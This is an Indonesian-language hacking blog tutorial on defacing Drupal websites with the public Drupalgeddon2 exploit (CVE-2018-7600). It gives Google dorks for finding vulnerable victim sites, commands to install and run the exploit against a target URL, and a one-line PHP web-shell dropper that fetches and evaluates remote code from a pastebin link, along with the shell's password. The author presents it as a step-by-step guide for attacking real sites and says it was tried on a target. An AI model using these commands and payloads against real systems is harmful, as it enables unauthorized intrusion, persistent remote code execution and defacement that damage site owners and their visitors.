Tutorial deface metode Drupal RCE

Tag :
- Deface Drupal RCE
- Drupalgeddon2
- Exploit drupalgeddon2
- Instal drupalgeddon2
- Instal drupalgeddon2 in Termux


Sedikit cerita mengenai Drupalgeddon2 :
Exsploitasi Drupalgeddon2 Dimulai setelah proof-of-concept Dipublikasi. Kode yang dihosting di GitHub, dibuat oleh Vitalii Rudnykh, seorang peneliti keamanan Rusia. Kode ini didasarkan pada rincian kerentanan Drupalgeddon2 yang diterbitkan oleh Check Point dan Dofinity.
Kerentanan ( CVE-2018-7600 ) memungkinkan penyerang untuk menjalankan kode apa pun yang diinginkannya terhadap salah satu komponen inti CMS, yang secara efektif mengambil alih sebuah situs.

Langsung saja ke Tutorialnya :

Bahan persiapan :
1. Linux / Termux ( yang ingin menjalankan di os windows harus mengistal ruby terlebih dahulu )
2. Shell :
 echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/uTnyQv5n"));?>' > namashell.php
     Password shellnya : alltutorcyber
3. Dork :  "alltutorcyber" inurl:/?q=node/ "powered by drupal"
    ( Kembangi lagi dorknya, "alltutorcyber" bisa diganti dengan kata kata yang publik )

Cara Menginstal drupalgeddon2 :
 > pkg install git
> gem install ruby
> git clone https://github.com/dreadlocked/Drupalgeddon2
Cara Menjalankannya :
 > cd Drupalgeddon2
> ruby drupalgeddon2.rb http://sitetarget.co.li/

 1. Pertama tama dorking dulu "casino" inurl:/?q=node/ "powered by drupal" ke google pencarian


2. Pilih salah satu web target
3. Untuk mencheck versi Drupalnya tambahkan /CHANGELOG.txt pada link web target.

exploit drupalgeddon2 hanya bisa pada versi 7.x.x . Jika menemukan versi 6 / 8 tinggalin aja

4. Masukkan ke exploitnya lalu jalankan



5. Jika muncul "Fake Shell" masukkan perintah uname -a


6. Nahh.. Jika muncul nama servernya berarti vuln untuk upload shell. Masukkan perintah echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/uTnyQv5n"));?>' > namashell.php



7. Jika sudah begini berarti kita sudah sukses mengupload shellnya. tinggal buka web target dan tambahin nama shell yang kalian upload tadi /namashell.php


Mudah bukan? :v
Itu adalah target yang saya coba menggunakan exploit drupalgeddon2. Password shellnya adalah "alltutorcyber"


Sekianlah Postingan Dari All Tutor Cyber tentang "Deface Drupal RCE" Semoga Bisa Bermanfaat!

Sumber : http://www.alltutorcyber.com/2018/05/deface-drupalgeddon2-rce.html?m=1